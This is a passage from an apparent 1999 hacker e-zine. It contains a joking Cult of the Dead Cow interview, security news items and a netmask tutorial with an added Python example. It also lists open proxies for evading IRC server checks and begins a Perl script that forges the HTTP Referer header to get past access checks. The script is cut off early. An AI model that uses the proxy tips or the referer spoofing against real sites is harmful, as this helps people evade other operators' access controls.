      and "Cracking" simply means breaking software registrations and the like. 
      What do you feel each term represents these days? 

      cDc answers:

      Obscure Images answers: We would like to take a stand on this nonsense
      once and for all. We are of the firm opinion that the qualification for
      being a hacker is not something that can be stated on clear moral
      grounds. As far as we are concerned, crackers are something you eat.

      Reid Fleming answers: The term "cracker" is divisive, insulting, and
      should be considered inappropriate in mixed company. Same for "honky"
      and "caucasian".

      "Hacker" on the other hand, is perfectly fine for most social situations.

      As in: "Hey, you! Hacker! Suck my dick!"

      G. Ratte' answers: Personally, I never use the term "hacking"... it's
      all just messing around to me, and some of it could get you into
      trouble. Whatever. "Cracking" means removing software protection, and a
      "cracker" is a white boy. I don't know when people started fussing over
      the terms and using "cracking" to mean system intrusions, but I think it
      all carries the stench of journalist-invented nonsense. Same with all
      that "white/black hat" crap. Nobody in this situation uses those terms,
      and they readily identify the user as an outsider.

      Tequila Willy answers: Dear Bog-Oh,

      Your sensitivity is to be applauded in these times largely characterized
      by egocentric thinking. I appreciate that you've taken the time to ask me
      what I *feel* about these terms. I feel good about what each term
      represents. Thank you for asking.

      Tweety Fish answers: A cracker is somebody who cracks warez, and/or a
      pejorative term for a white person. Any other meaning is never going to
      catch on in the media, nor with the old school. It's just too
      complicated to remember the distinction all the time. The people who are
      hackers by anybody's definition have done some... uh... mischievous
      things in their time; it's part of the nature of the beast. To say that
      "a real hacker would never break into a computer system" indicates - to
      me - a lack of understanding of the original meaning of the word. Of
      course a real hacker would break into a computer system, if it was an
      interesting enough problem and they didn't anticipate anybody having a
      problem with it. I agree that the media should widen its definition of
      what a hacker is, but that's not the argument I usually see, especially
      here on slashdot. I see a lot more of "they aren't a real hacker,
      because they break into systems and/or do security stuff", which is
      plain silly.

      Personally, I refer to people by whatever term they would like me to
      use, unless I don't like them. Besides which, if you are doing something
      unexpected, unforeseen, or disallowed to any system (which is my pocket
      definition of hacking) somebody is always going to think it's bad,
      until you laboriously convince them otherwise, on a case by case basis.

      Why get caught up in semantic arguments when you could be doing cool           
      things and get noticed for THAT, instead? 

      phray01 asks: please be honest 
           (1)boxers (2)briefs (3)panties (4)thongs (5)nothing (6)orange                     
           (7)Hemos the Hamster

      cDc answers:

      Obscure Images answers: All of the above, though not necessarily at the           
      same time. -- Reid Fleming answers: sacred vestments -- GA Ellsworth 
      answers: Boxers for me.. -- G. Ratte' answers: I refuse to answer
      this question, as  I don't want to encourage your gross masturbatory 
      fantasies. What I choose to cover my massive, pulsating tool swinging
      handily between my taut legs is my business, and my business only. 
      What should the touch of  soft fabric brushing the tender head of my
      otherwise steely rod matter to the likes of you?  Disgusting! -- 
      Nighstalker answers: Sheer to the waist black seamed pantyhose for 
      formal affairs. -- DilDog answers: All of the above. 
      -- Tequila Willy answers: Dear phray01, 

      The etiquette in this case actually depends upon whether you were east or     
      west of the Mississippi when this unfortunate accident occurred. 
      East of the Mississippi, the gas station attendant should remove 
      the dog's head from your windshield wipers when cleaning the 
      windshield. However, please be prepared to tip for this service. 
      West of the Mississippi, it is usually considered bad manners to 
      expect gas station attendants to remove any animal bits that have 
      been wedged in your car parts. Thank you for asking. -- Tweety Fish 
      answers: I actually try not to wear any slashdot operators that 
      close to my skin. Makes my pants look funny. 

      Foogle asks: Let's face it - most people regard the cdc as a bunch of           
      script-kiddies looking for some limelight. The BackOrifice software           
      really made this worse, because it was seen, not as an admin tool, but as     
      an application meant to propagate cracking. How does this make you feel?
      That is, what are your personal thoughts on the cult's activities and how 
      do you think they should be viewed from the professional side of the 
      industry? 

      cDc answers:

      Obscure Images answers: cDc is not a group of script kiddies. We are           
      united in our interest to hack the world, be it through computers, words,
      images, sounds, politics, money, or sex. Those who consider us to be           
      script kiddies ought to shut the fuck up and write their own tools. Using    
      tools doesn't make someone a script kiddie, what makes a script kiddie is 
      the use of other people's tools to accomplish things they  have no 
      interest in understanding. It is understandable for  professionals to be 
      concerned with our reputations, but that is why we've been completely 
      open with our tools. We have software that  can be used as very effective 
      tools. -- Reid Fleming answers: Most professionals get it. The trojan
      horse problem was considered to be low priority a year ago. Things have
      changed as a direct result of Back Orifice and Netbus. 

      (By the way, you ever notice that sometimes journalists turn to Russ           
      Cooper for an "independent" perspective on Microsoft? And you ever notice    
      how often he agrees with the Microsoft position?) -- G. Ratte' answers: It's
      somewhat frustrating when something a lot of effort has gone into is
      totally misunderstood by so many people. A lot of people seem to have an
      aversion to the big picture and how BO fits into a larger whole. As for
      'the industry,' . Rah rah venture capital, rah rah IPO. "We've got this
      great new site, Hats4Cats.com, a brave new world of headgear for our
      feline friends! We're seeking the perfect partners to get this off the
      ground right, and if you'll just look over this media kit at your leisure    
      after the convention, we'll have someone call you in the next few days 
      about some great opportunities!" That's 'the industry.' 'The industry' can 
      kiss our collective cDc ass. -- Nighstalker answers:  Most people couldn't 
      plug in new RAM to their machines or install an application with the aid 
      of an installation wizard. More so for the people that write about the 
      digital underground who are not a part of the digital underground. 

      BO was released to show up the miserable security of Windows, in the hope 
      that MS would do something other than issue press releases and that users 
      would be made aware of the pitiful security on their machines, 
      particularly when connected to the Internet. BO2K was released in response
      to the pleas of countless IT professionals who needed a powerful admin tool.
      -- DilDog answers: I don't feel one way or the other about it. I write code
      to fill a void whenever I find I need something that doesn't
      exist. Hence, BO2K. 

      What Linux is to Commercial Unix, BO2K is to Commercial remote admin          
      tools. I mean, what kind of sick and twisted hax0r would want to use FREE 
      and POWERFUL software without having to pay out of their ass for 
      it. --  Tequila Willy answers: Dear Foogle, Thank you for being 
      concerned about my feelings. However, I disagree with the metaphysical
      assumptions of your first question. I believe I choose how I feel and that
      the reaction of "most people" cannot make me feel any particular way. That
      being said, your second question seems more appropriate. The Cult of the 
      Dead Cow should be viewed as what they are, namely, experts in global 
      domination. -- Tweety Fish answers: So the technical definition of
      Script Kiddie is one
      who uses pre-made scripts or tools to hack sites, instead of developing           
      their own tools.. by that definition, how could we possibly be script           
      kiddies? 

      In the larger sense of BO2K being an application meant to propagate           
      cracking, yes, that might happen, but the way we're doing it does serious     
      work to raise awareness of these issues. I think we're perfectly 
      aware that this can be hard to understand, and we're perfectly 
      willing to keep hammering our message home until people start to get it,
      and start working to fix these problems. 

      An_onymous Coward asks: First of all I've got to say I think cdc is 
      pretty damn cool. I was digging their .txts since I got my first 
      dialup shell account long ago. Now, with you guys being so security 
      minded and all, there's only one question I could think of for you: 
      If you were to build your ideal network, with telnet, ssh, www, 
      ftp, pop3, smtp, file & printer sharing, bind, etc... what would be 
      your ideal configuration to maximize security? Please be specific 
      about Network OSs, routers, network policies,  protocols, 
      filesystems, permissions, daemons, firewall rules, and anything 
      else that comes to mind. 

      cDc answers:

      Reid Fleming answers: Dedicated fiber lines in a star configuration. 
      Ultra low transmissions, only a few quanta, to foil optical taps.
      One-time pad encryption for each packet. All plaintext messages 
      composed in an alien language unknown to anyone but the 
      participants. The actual content of the messages being hidden in 
      subliminal channels too sensitive to be mentioned here. -- DilDog 
      answers: For cryin' out loud. My ideal network doesn't have half of 
      that crap running. It can all be done with DCOM and HTTP. Just 
      kidding! 

      I -know- this is a Linux crowd, but I'm tellin' ya, take a look at           
      OpenBSD for PROACTIVE security when it comes to that mission critical           
      firewall box, network monitor, webserver, etc. -- Tequila Willy answers: 
      Dear Anonymous Coward, 

      First, thank you for your compliments. However I am left wondering how           
      many of our text files you have actually read. All of your questions have     
      already been addressed in detail in our text file, Wet Mount Slide. --
      Tweety Fish answers: DUD3 Y3R TRY1N T0 B3 4LL SN34KY 4N' S0C1AL
      3N1N33R US AN' SH1T A1N'T Y000? B3TT3R US3 NM4P INST3D!@$#!@%

      If you want a genuine answer to that question, I'm sure the l0pht would           
      be able to answer it as specifically as you need for a small fee.

      Freshman asks: Since BO is/was a big deal, I'm wondering what kind of
      companies have tried to contact you and what they had to say. Did           
      Microsoft ever give you guys a buzz? The DoD maybe? CIA? If so, what did          
      they have to say? 

      cDc answers:

      Tweety Fish answers: We've been in constant communication with the CIA,           
      NSA, and MOSSAD to make sure that the government-specific backdoors built     
      into BO2K meet their tough standards for EoE (Ease of Eavesdropping).. we 
      value the contributions the US and other governments have made to these 
      products, and look forward to working much much more with them in the 
      future. 

      Microsoft hates us, I think. 

      rikek asks: I've always wondered... what does a group that produces           
      "script kiddie material" (no offense intended, it's inevitable whether           
      you want it or not) feel about their work? Every now and then I'm plagued     
      by contact with an "3R33+ H@X0R", who is most likely some 14 year old
      without anything better to do who is causing some minor damage,
      without a clue as to what a TCP/IP packet is. The ratio of clueful 
      hackers cracking to script kiddies cracking has gone way down over 
      the few years, and products like BO are likely to blame. So what do 
      you guys think about this... would you rather this turned around, 
      or do you feel that distributing tools to nameless masses is a good 
      method at getting back at the real evils? 

      cDc answers:

      Obscure Images answers: There will always be people who ride on the work           
      of others. That's all that script kiddies are, poseurs, trendies or what           
      have you. Back in the old days after War Games came out there were floods
      of "hackers" out there and these same comments were made. In the  end, 
      there is always a shakeout process. Most of the current script kiddies 
      will abandon their activities, leaving the hardcore still 
      in place. -- Reid Fleming answers: I suggest reading the section on
      Evolutionarily Stable Strategies in The Selfish Gene. -- G. Ratte'
      answers: It's tricky, and I refuse to get into the kind of
      age/experience penis-size wars that always come up with this "lamers
      are running around with dangerous scripts" thing. Back Orifice is
      distributed the way it is to force an issue. A hell of a lot of
      people should be upset their computers are wide open.
      I've always hoped that people interested in our tools would seek out our           
      other material and read up on what we're about. And that they'd be smart           
      enough to figure out that bumming some hapless person's day by screwing 
      up their computer is not a good way to spend an afternoon. The end of all 
      our text files from the last few years says this: "Save yourself, go 
      outside, DO SOMETHING!" -- Nighstalker answers: Virtually anything can be 
      used for evil, as virtually anything can be used for good. 

      One thing about BO2K is that the author deliberately made it more
      difficult for clueless script kiddies to use. They're the ones who           
      constantly plague us with badly mis-spelled complaints about how BO2K           
      doesn't work. The IT professionals sing our praises about the power and           
      ease of use of BO2K. 

      BO2K is forcing evolution to accelerate in the world of computer           
      security. We regret the damage that is done with BO2K. In the long run,
      we will all be the better for this. -- Tequila Willy answers: I think you     
      have raised an excellent question. However, I am doubtful that good     
      products like BO can be identified as the cause of the diminishing 
      number of hackers in comparison to the number of script kiddies. I
      believe that each individual must take responsibility for the 
      character traits that they choose to cultivate in themselves. If 
      the number of script kiddies continues to grow and more individuals 
      choose to take the path of becoming a script kiddie rather than 
      pursuing hacking skills, then this seems more plausibly interpreted 
      as a sign of laziness or a short attention span on the part of 
      those who choose this path. I don't think that BO could be blamed 
      for such a result. That being said, I would prefer to see more 
      hackers than script kiddies but only because I respect the skills 
      of hackers more than the skills of script kiddies. And I would    
      rather participate in a society populated by individuals I can respect.           
      However, I believe your question should lead us to thinking more about           
      what sort of behaviors should or should not be tolerated in cyberspace.           
      And before we can address that question, it would first be helpful to           
      conduct an inquiry into the metaphysics of hacking. I believe that many           
      of the laws regarding computer security issues are misguided because they     
      make fundamental assumptions about the nature of the computer 
      hacking  environment that simply are erroneous. -- Tweety Fish 
      answers: The ratio  might have changed, but the total number of 
      people with a clue has increased, not decreased. Some 14 year old 
      might get their start by messing with bo2k at school, and then they 
      might start writing plugins, and then they might need to do something
      stranger, so they'll mod netcat to suit their needs, and then they
      might realize how horribly insecure their own system is, and install 
      linux or freeBSD to mitigate that somewhat, and then they might get out
      of school and go get a job securing corporate networks with all the 
      knowledge they've gained. 

      Kids will be kids. If computer security was a real priority for operating     
      system vendors, Joe Random 14 year old would need a lot more than          
      something as general purpose as BO2K to start trouble. He'd need... uh... 
      a car, say, or some bleach and ammonia, or a lot of beer. 
      
      yoshi asks: What should application and OS designers do to build systems          
      which are more secure? 
      
      cDc answers:

      Reid Fleming answers: For starters, they should spend more time and energy 
      on security than UI design, documentation, or product packaging. -- 
      Nighstalker answers: Learn from the mistakes of the past and the solutions 
      of today. It's not that hard to implement security. It's just easier for
      lazy coders and indifferent beancounters to blow it off by saying that, 
      "This is not something our customers are demanding in our product." -- 
      DilDog answers: Proactive security measures. Encrypt everything. Eliminate
      HTTP and go right to HTTPS everywhere. -- Tweety Fish answers: Make security           
      concerns and security audits an integral part of the development. 

      Alpha42 asks: Okay.. Here's my question.. what ever happened to Obscure           
      Images?! I haven't seen anything from him in AGES... Don't get me wrong,           
      I thought BO was good and all, and I'm sure it's generated 99% of the PR           
      lately.. but I miss the original cDc stuff.. the files! :) And Obscure?!           
      OH man... 

      cDc answers:

      Obscure Images answers: Hey, I'm still here, and I am as active as I have     
      ever been. I've never been gone, just acting back in the shadows. I  do 
      what I can to help plan and implement our projects. Most of it  comes 
      without the glory or press attention, but it has to be done for us to be 
      successful. Over the past 10 years I've gone to school, gone out into the 
      world, gotten married, and started to go a bit grey. Not related to my 
      marriage, I assure you. There will be more files from me, it's just a 
      matter of finishing them. Keep your eyes open, your mouths too.

      As far as my poetry goes, I have an excuse. It was 10 years ago, I was a           
      typical late teen with clinical depression and the idea that I could           
      write poetry. I stand by my stories, but would rather see the poems fade           
      away like my youth. 

      Oh yeah, you have seen me, every time you see our Paramedia Cross logo. --
      Tweety Fish answers: Near the end of the cold war, Obscure Images was 
      captured by a splinter faction of the KGB, and forced to write polemics, 
      in verse, in a futile attempt to turn the people of the former Soviet 
      Union back on the true path to communism. He's back 
      now, and doing fine, except for that twitch. 

      Effugas asks: What tools, in your minds, would you consider the most           
      useful but least acknowledged tool in your security analysis collection?           
      When backed into a corner, unsure how to whip something into shape, what           
      obscure and strange network(or even non-network!) utility popped into           
      mind and either performed some amazing function you couldn't imagine           
      coding yourself or gave you the necessary cluephone ringing (via source           
      code peek) to pull it off yourself? 
      
      cDc answers:

      DilDog answers: lsof. Use it. 
      
      Anonymous Coward asks: My question is simple: 
      When will you start to do productive things ? 
      Ok, here is some context for the question. I know about BO2K ; and saw           
      miscellaneous software at cDc site. 
      But on the other hand, the cDc has existed much longer than Linux itself,
      the FreeBSD team, NetBSD, and for probably as long as the FSF
      itself. On one hand you have a wealth of software (for instance
      here or here), on the other hand, after 15 years, you have a
      handful of cracking tools, one Windows administration package, an
      unorganized set of information, and stickers + temporary tattoos for
      sale. In particular, it is a total mystery why since all that time, you haven't
      done one of the following:

           Review, summarize existing security systems, document and implement                     
           a robust security model. Unix model is total crap ; even Multics 
           (design: 1963) was better (Multics achieved B2 security rating). 
                    
           Audit publicly a freely available Unix (today done by OpenBSD
           instead). Write automatic assembly code analyzer to search for bugs
           (or at least for C). Commercial tools exist by now, and last time I
           tried to see if a free one existed, all I could find on cDc site
           was a "Tao of Windows Buffer Overflow" (a re-hash of techniques
           found for instance in Morris' Internet Worm in 1988. See Spafford's
           excellent report, and the Worm's FAQ). Lend a bunch of your
           machines, to hold contests such as "the best security model for
           Linux/BSD, running almost all possible services/servers, CGI, ...".

      In this context, when will you stop selling temporary tattoos, and start
      real programming (other than BO2K)? 

      cDc answers:

      Obscure Images answers: While cDc does some programming, this is not the           
      sole focus of our efforts. To compare us to the other groups you mention           
      you have to realize that we have different goals, as well as methods. We           
      don't feel obligated to do anything for anyone. Our work is directed by           
      our desires and our goals, not the desires of the community. Everything 
      we  do is productive in our eyes. We like to think that we've done 
      work every bit as important as any of the above groups. It's all a 
      matter of perspective. We have no problem with the people who have 
      given their time and energy to these other projects, but we are not 
      like them. We do things when we want to, in the way that we want 
      to. -- Reid Fleming answers:  Temporary tattoos are a CRITICAL 
      ELEMENT of our security strategy. To suggest otherwise is sheer 
      lunacy. -- G. Ratte' answers: Wow. I don't know  when I'm going to 
      be productive. Mom wants grandkids, too. Why should we  do those 
      things? Maybe we will, maybe we won't. Why don't you? We do other         
      things. As far as "lend a bunch of your machines to hold contests..."           
      that's funny, what bunch of machines? None of us are wealthy. You looked          
      at our site and blew it off as a "handful of cracking tools & an          
      unorganized bunch of information." That's the first electronic magazine           
      ever, starting in 1984. It was a big deal to me when I was fourteen and           
      bored in a small town, and I was doing something new and exciting and           
      fun. I don't necessarily want to satisfy your weird little computer           
      fetishes. I've got a dog and a cat and a screwy relationship and my           
      picture in SPIN and no job and I'm busy. 
      Too busy for you. 

      To quote from cDc #300: 

           THE POINT by Bryan O'Sullivan 

      you could spend an hour counting the petals in a flower it might take you    
      a year to count the veins in each petal if you spent ten lifetimes, 
      maybe you could count its cells 

      but you'd have completely missed the point you fuckhead
      
      -- Nighstalker answers: And this comes back to my first answer. cDc is 
      NOT ABOUT PROGRAMMING! 

      Programming and computers are only a means to an end. -- Tequila Willy           
      answers:

      Dear Anonymous Coward,

      Your question seems very serious and as such seems to be counter           
      productive. The Cult of the Dead Cow exemplifies the very attitude that           
      ought to be cultivated considering the absurd nature of existence. Take a 
      moment to contemplate your death and your own concerns about what counts 
      as productive behavior may shift. You may think to yourself, "I am merely 
      a mortal who will die, but I must live responsibly for the sake of
      those who will survive me." But of course your friends and family will die 
      and there will come a time when no one alive will even have a memory of 
      your existence. And if that weren't enough, at some point our own Sun will 
      supernova, and when this occurs, human life on earth will be destroyed. 

      At that point, human beings will not even exist to contemplate the
      fates of those like yourself who died long ago. From this perspective, all 
      human actions seem to take on an equal importance: our concerns are          
      absurd! To live freely and responsibly, a mature human being must
      realize this point. Having fun, living and loving well, being playful           
      (and hence flexible in your living): these actions take on much greater           
      importance than behaving in a serious (and hence rigid) manner. Your           
      question is foolish because it is not asked with a foolish spirit. 
      -- Tweety Fish answers: Read our files. Read our press releases. It's 
      all about style, jackass. Incidentally, the first of your suggestions
      is a primary goal of the OpenBSD project, like you said. The second 
      suggestion is a fine idea, why don't you do it? (re: spafford's paper
      and the internet worm, the internet worm didn't run on win32, now, did
      it?). As for the  third suggestion, gee, that's a great idea. Why don't
      we kick down a  couple hundred thousand for a semi-trailer we can turn 
      into the cDc hackmobile, and load it up with all these high-end systems
      we have sitting around, and hire somebody to drive it around the country
      so people can mess with it for free! 
      
      We do what we're interested in, what's fun, and what's within our 
      resources, plain and simple. And we try to keep it funny. 

      Descriptions of who these people are are at 
      http://www.cultdeadcow.com/members/. 
      
      @HWA
      
48.0  Buffer Overflow in Communicator May Allow Code to Run           
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond
      Another buffer overflow in the Windows version of Netscape
      Communicator has been discovered. This one deals with incorrect
      bounds-checking in dynamic font support. Example exploit code is
      available and confirms the overflow on NT 4.0 using Netscape 4.61
      and 4.7. It should be possible to use this exploit to execute
      arbitrary code.

      White Hats
      http://www.whitehats.com/browsers/maxvisioncrash47/index.html
      
      @HWA
      
49.0  Listserver hacked
      ~~~~~~~~~~~~~~~~~
      
      From http://www.403-security.org/
      
      http://www.it.fairfax.com.au/breaking/19991021/A1636-1999Oct21.html
      
      
      Update: Evidence points to listserver hack
      14:59 Thursday 21 October 1999

      By NATHAN COCHRANE

      A PRESS release announcement e-mail listserver attached to the
      Federal Department of Communications, IT and the Arts appears to
      have been hacked.

      Several e-mails purporting to be from the department have arrived in           
      reporters' mail boxes this afternoon, almost perfect duplicates of           
      announcements sent earlier in the day about a postal code of practice.           
      However, the sending address was from an anonymous remailer, Replay.com,           
      based in the Netherlands and the e-mails did not contain a subject line. 
      Subtle changes were made to the apparently hacked e-mails, including a
      pointer to a nonexistent Web page on the DCITA official site and a notice
      asking those seeking to remove themselves from the mailing list to
      send a message to a provocative, non-existent address.

      A spokesman for the Minister, Senator Alston, was unavailable for comment. 

      Roddy Strachan, a Melbourne expert in Linux majordomo list group systems,     
      said it appeared the server had been incorrectly configured, allowing a 
      hacker in through an insecure default setting. 
      
      "Well, the way I have set up our mailing list program, is that people who     
      aren't subscribed can't post to the list," Strachan said. "And the
      admin has to approve all posts before it goes out to the
      recipients. This stops the hassle of bouncing mailers, etc.

      "Looking at the message it should say majordomo@blah and using
      Replay.com is very suss. Even the URL, the 'path=1234', just looks like a
      made-up piece of nonsense."

      Replay.com specialises in providing anonymous remailing services,
      cryptographic products including Pretty Good Privacy, books on
      cracking security systems like DES, and secure Linux distributions.
      
      @HWA
      
50.0 Skewl: "How a Netmask Works" By Steven Lee        
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       
                              How a netmask works.
                                        
       _________________________________________________________________
                                        
     Preface
     
     I've been using the internet for several years now. When I set up my
     first slip connection, I waded through mountains of cryptic
     information that I barely understood. One of the pieces of information
     that I really didn't understand at all was how a netmask worked. I
     just took it on faith that it made sense and used whatever numbers
     someone gave me. I finally found a reference that (almost) described
     how a netmask works. Armed with a near description, I sat down with a
     scientific calculator (I can't convert decimal to binary and back in
     my head) and figured out what the description meant. Since this has
     been a hole in my knowledge, and all the references I have seen don't
     spell it out, I decided to see if I can explain it and add to the pool
     of knowledge so you won't have to go through my process to discover
     this.
     
       _________________________________________________________________
                                        
     There are three pieces of information that interact with each other to
     resolve IP addressing. They are the netmask, the IP address, and the
     network address. As you may already know, when an IP packet is sent to
     a foreign address (off of this local network) the network address is
     all that is used for routing purposes until the packet reaches the
     target network. At this point the whole IP address is used to
     determine the specific machine on this network to send the packet to
     based on local routing tables or dynamic ARP (address resolution
     protocol, which we will not cover here). In order for a router to know
     the network address, it uses the IP address and the netmask.

     Here's the relationship:

     Your network address is your IP address masked (bitwise AND) with your
     netmask. This may mean nothing to you without the following
     clarification. Let's use an example.
     
     If your netmask is:       255.255.255.0
     and your IP address is:   198.139.158.3
       _________________________________________________________________
     your Network address is:  198.139.158.0

     If you were in a subnetted environment you might have:

     If your netmask is:       255.255.255.224
     and your IP address is:   198.139.158.55
       _________________________________________________________________
     your Network address is:  198.139.158.32
     
     This still only alludes to the "secret" of the netmask. To shed light
     on the second example let's take a look at the meaning of the netmask.
     We are going to convert the decimal notation (4 octets), to binary
     notation. The 1's in the netmask will imply the value "true", while
     the 0's will imply the value "false". The true values will be allowed
     to pass through the netmask and the false values will not. The
     netmask acts as a filter.
     
     
     
                                   Decimal          Binary

     The IP address:               198.139.158.55   11000110 10001011 10011110 00110111
     The netmask:                  255.255.255.224  11111111 11111111 11111111 11100000
     The Network address would be: 198.139.158.32   11000110 10001011 10011110 00100000
     
     In the above chart, you can see in the binary column that whenever the
     netmask value is 0, the network address also has a value of 0.
     Whenever the netmask has a value of 1, the corresponding network
     address takes its value from the IP address. Try looking down from the
     IP address, to the netmask, then to the network address, digit by
     digit.
     
     I hope this clarifies it for you.
     
     Produced by:
     
     Steven Lee, steven@main.nc.us
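
     The masking described above, as an added example (not part of the
     original article): it reproduces both worked cases and the binary chart,
     and goes slightly beyond the text by rejecting non-contiguous netmasks
     and by testing whether a destination is local or foreign. All function
     names are this example's own.

```python
# Added example: the netmask as a bitwise filter over a 32-bit IP address.

def parse_dotted_quad(text):
    """Convert '198.139.158.55' into a 32-bit integer, rejecting malformed input."""
    parts = text.strip().split(".")
    if len(parts) != 4:
        raise ValueError(f"expected 4 octets, got {len(parts)}: {text!r}")
    value = 0
    for part in parts:
        if not (part.isascii() and part.isdigit()) or int(part) > 255:
            raise ValueError(f"bad octet {part!r} in {text!r}")
        value = (value << 8) | int(part)
    return value


def to_dotted_quad(value):
    """Render a 32-bit integer back into decimal dotted-quad notation."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary(value):
    """Render a 32-bit integer as four space-separated binary octets."""
    return " ".join(f"{(value >> shift) & 0xFF:08b}" for shift in (24, 16, 8, 0))


def prefix_length(netmask):
    """Count the leading 1 bits; a mask with a 1 after a 0 is rejected."""
    mask = parse_dotted_quad(netmask)
    host_bits = ~mask & 0xFFFFFFFF
    # A valid host part looks like 0...0111; adding 1 must clear every bit.
    if host_bits & (host_bits + 1):
        raise ValueError(f"netmask {netmask} is not a contiguous run of 1 bits")
    return 32 - host_bits.bit_length()


def network_address(ip, netmask):
    """Network address = IP address AND netmask, as the article states."""
    prefix_length(netmask)  # validates the mask before it is used
    return to_dotted_quad(parse_dotted_quad(ip) & parse_dotted_quad(netmask))


def is_foreign(source_ip, dest_ip, netmask):
    """True when dest_ip is off the sender's local network and must be routed."""
    return network_address(source_ip, netmask) != network_address(dest_ip, netmask)


def chart(ip, netmask):
    """Rebuild the article's decimal/binary chart as a list of text rows."""
    rows = [("IP address", ip),
            ("Netmask", netmask),
            ("Network address", network_address(ip, netmask))]
    return [f"{label:<16}{addr:<17}{to_binary(parse_dotted_quad(addr))}"
            for label, addr in rows]


if __name__ == "__main__":
    for line in chart("198.139.158.55", "255.255.255.224"):
        print(line)
    # Same two hosts, two different masks: the subnet mask splits them apart.
    for mask in ("255.255.255.0", "255.255.255.224"):
        verdict = "foreign" if is_foreign("198.139.158.55", "198.139.158.3", mask) else "local"
        print(f"198.139.158.3 seen from 198.139.158.55 with {mask}: {verdict}")
```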
     
     @HWA
     
51.0  More proxies supplied by IRC 4 ALL          
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced by sAs- (sas2@usa.net) 
      
      A lot of these servers work and are fresh; I've used them successfully
      on IRC. I won't mention which servers you can use that don't require 
      IDENT or check for OPEN PROXIES, but they are out there! Suggestion:
      do a /links and go thru the list until you find a server that will
      let you on. - Ed
      
      http://www.lightspeed.de/irc4all/index.htm
      
      
      Port       Wingate service
      ~~~~       ~~~~~~~~~~~~~~~~~~~~~~
      
       21        FTP Proxy Server
       23        Telnet Proxy Server
       53        DNS Proxy Server
       80        WWW Proxy Server
       110       POP3 Proxy Server
       808       Remote Control Service
       1080      SOCKS Proxy Server
       1090      Real Audio Proxy Server
       7000      VDOlive Proxy Server
       8000      XDMA Proxy Server
       8010      Log Service
       
     Telnet/SOCKS (wingate etc) Proxies;
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

     
      
      (C) Paradox
      paradox@cyberjunkie.com
      
      Check the pages for more proxies/updates...
      http://www.lightspeed.de/irc4all/index.htm
      
      
      
      Other proxies;
      ~~~~~~~~~~~~~
      
      Sourced by sAs-
      From http://proxys4all.cgi.net/public.html

      Magus Net Anonymous Proxy [.com - USA] www.magusnet.com 
      The Magus Net proxy is a great free public proxy server based in Arizona,
      USA. It can be quite busy and can be slow or down sometimes. They provide
      free HTTP, FTP, WAIS and GOPHER proxy service and also offer a pay service
      for SSL & SSH, and have now added a demo for SSL. 
   
      The Magus Net DeleGate proxy can be used in your browser settings or manually
      in the URL window. It also allows chaining before and after their proxy:
   
      Example HTTP:
      http://magusnet.com:8084/-_-http://www.destination.domain
      Example FTP:
      http://magusnet.com:8084/-_-ftp://ftp.destination.domain
   
      - Currently active ports: 3128,8081,8082,8083,9000,10080
      3128 - Local - Access by Account Holders Only
      8081 - Local - Public Access
      8082 - Chained thru Ringer DeleGate Proxy in Japan
      8083 - Chained thru NRL Onion Router in US - Operated by US.Navy
      8084 - WAS chained thru Lucent Personal WWW Assistant in US 
             LPWA has gone pay-only(proxymate.com). 
             Port closed July 14, 1999
             See http://www.lpwa.com for details.
      9000 - Local - Encrypts with SSL between your browser and this Proxy
      10080 - Local - Public Access
   
      Magus Net proxy hosts can also be reached as:
   
      magusnet.gilbert.az.us
      
      Junkbuster Proxy Services [.com -USA] www.junkbuster.com 
      The Internet Junkbuster Proxy blocks unwanted banner ads and protects
      your privacy from cookies and other threats. It's free and runs under
      Windows 95/98/NT and a variety of UNIX-like systems. It works with
      almost any browser. Installation typically takes minutes. 

      JunkBuster Proxys: 
      ~~~~~~~~~~~~~~~~~~

      
      Web-based CGI proxies;
      ~~~~~~~~~~~~~~~~~~~~~~
      
      http://proxys4all.cgi.net/web-based.html
      
      Telnet/SOCKS proxies;
      ~~~~~~~~~~~~~~~~~~~~~
      
      wingates, all port 23

      I keep hoping to have more for you all but as fast as I can get them
      they tend to die. Best bet is always to scan your own. These have not
      all been tested yet.


      
      Copyright 1998-99 Proxys 4 All 



    
      @HWA
      
52.0  Perl source for a webspoofing HTTP grabber
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced by sAs- 
      
      From http://proxys4all.cgi.net/files/webspf.pl
      
      #!/usr/bin/perl
      #
      # Web Spoof      
      # Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]      
      #      
      # Summary:       
      # Works as a normal command line web retrieval script,      
      # except will spoof the referer. This can be left to the script to do,      
      # or specified in the command line. This will bypass any kind of reference      
      # checking, in most cases. Will also screw up the REMOTE_HOST variable which      
      # some cgi scripts use, but the correct IP will of course be sent. Default      
      # browser is Netscape 4.5 under Win95. This can be changed in the script.
      #      
      # Usage:  - default output is standard out, to save to a file      
      #           you will need to redirect it, especially for        
      #           binary/image files -      
      #      
      #  ./webspf.pl [file] <referer>      
      #      
      # Examples:      
      #      
      #  ./webspf.pl language.perl.com/info/software.html > software.html      
      #      - referer would be language.perl.com/info/index.html -      
      #      
      #  ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif      
      #      - referer would be www.linux.org/images/logo/index.html -      
      #      
      #  ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html      
      #      - referer would be www.freebsd.org/whatever.html -      
      #      
      #      
      # 
      
      use IO::Socket;      
      
      
      $loc = $ARGV[0];                             # www.a.com/test.html      
      $temp = reverse($loc);                       # lmth.tset/moc.a.www      
      $host = substr($temp,rindex($temp,"\/")+1);  # moc.a.www      
      $host = reverse($host);                      # www.a.com      
      $dir = substr($loc,index($loc,"\/"));        # /test.html      
            
      $referer = $ARGV[1];                         # <blank>      
      if($referer eq "") {                         # true      
       $temp = substr($temp,index($temp,"\/"));    # /moc.a.www (slash kept, so the referer gets its "/")
       $temp = reverse($temp);                     # www.a.com/      
       $referer = $temp . "index\.html";           # www.a.com/index.html      
       }                                           # spoofed referer!     
      
      
      print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";      
      print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n";
      
      
